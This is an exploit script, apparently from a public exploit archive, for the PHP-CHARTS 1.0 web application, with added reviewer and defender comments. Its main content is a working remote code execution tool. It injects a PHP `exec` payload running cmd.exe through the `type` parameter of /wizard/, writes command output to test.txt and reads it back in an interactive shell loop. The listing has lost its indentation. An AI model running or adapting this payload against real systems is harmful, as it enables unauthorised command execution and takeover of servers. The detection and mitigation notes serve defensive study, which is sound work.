phpcharts.py
# Exploit Title : PHP-CHARTS 1.0
# Date : 26 June 2019
# Exploit Author : Doctor_Hacker
# Version : 1.0
# Tested on : Windows
import requests
# Proof-of-concept flow: read a command from the operator, place it in the
# `type` query parameter of /wizard/, then fetch /wizard/test.txt and print it.
# NOTE(review): indentation was lost in this listing, so the nesting of the
# try/while/if blocks below cannot be confirmed from this page.
#
# Defender notes (derived from the requests this script sends):
#  - Detection: GET requests to /wizard/ whose `type` value contains quote
#    characters, `exec(` or `cmd.exe` (possibly percent-encoded), followed by a
#    GET for /wizard/test.txt from the same client.
#  - Host artifact: a test.txt file appearing in the wizard directory; nothing
#    in this script removes it, so command output stays web-readable.
#  - Mitigation: presumably the wizard inserts `type` into PHP code that is then
#    evaluated (the server side is not shown here); accept only a fixed
#    allowlist of chart types and keep /wizard/ off production hosts or behind
#    authentication.

# Target host and port; the defaults point at a local test instance (loopback).
IP='127.0.0.1'
port=80
try:
# Reachability probe. The response is never inspected, so only a raised
# exception (connection error, etc.) is treated as "site down".
url="http://"+IP+":"+str(port)+"/wizard/index.php"
response = requests.get(url)
while True:
# Read one command per iteration; the literal string 'exit' ends the loop.
print ("Type exit to get out of here.")
cmd = input('shell@'+IP+':~# ')
if cmd.strip() == 'exit':
break
# Build the request URL. The `type` value starts with a single quote, then
# carries a PHP `echo exec(...)` statement that runs cmd.exe with the operator's
# command and redirects its output to test.txt (a relative path, so it lands in
# the process's working directory; the fetch below assumes that is /wizard/).
url="http://"+IP+":"+str(port)+"/wizard/?type='"
url=url+';echo exec("c:\\Windows\\system32\\cmd.exe /c '+cmd+' >test.txt");'
url=url+"'';';"
try:
response = requests.get(url)
# A 200 here only shows the page was served; it does not prove the command ran,
# and test.txt may still hold output from an earlier request.
if response.status_code == 200:
# Retrieve the file the command output was redirected into and print it.
url="http://"+IP+":"+str(port)+"/wizard/test.txt"
response = requests.get(url)
print(response.text)
# Bare except: every error (including KeyboardInterrupt) is reported with the
# same message and the underlying cause is discarded.
except:
print ("Exploit failed.")
# Bare except again; presumably paired with the first `try`, so any failure in
# the probe or the loop is reported as the site being unreachable.
except:
print ("I can't reach the site. Is the website up?")
# And sleep............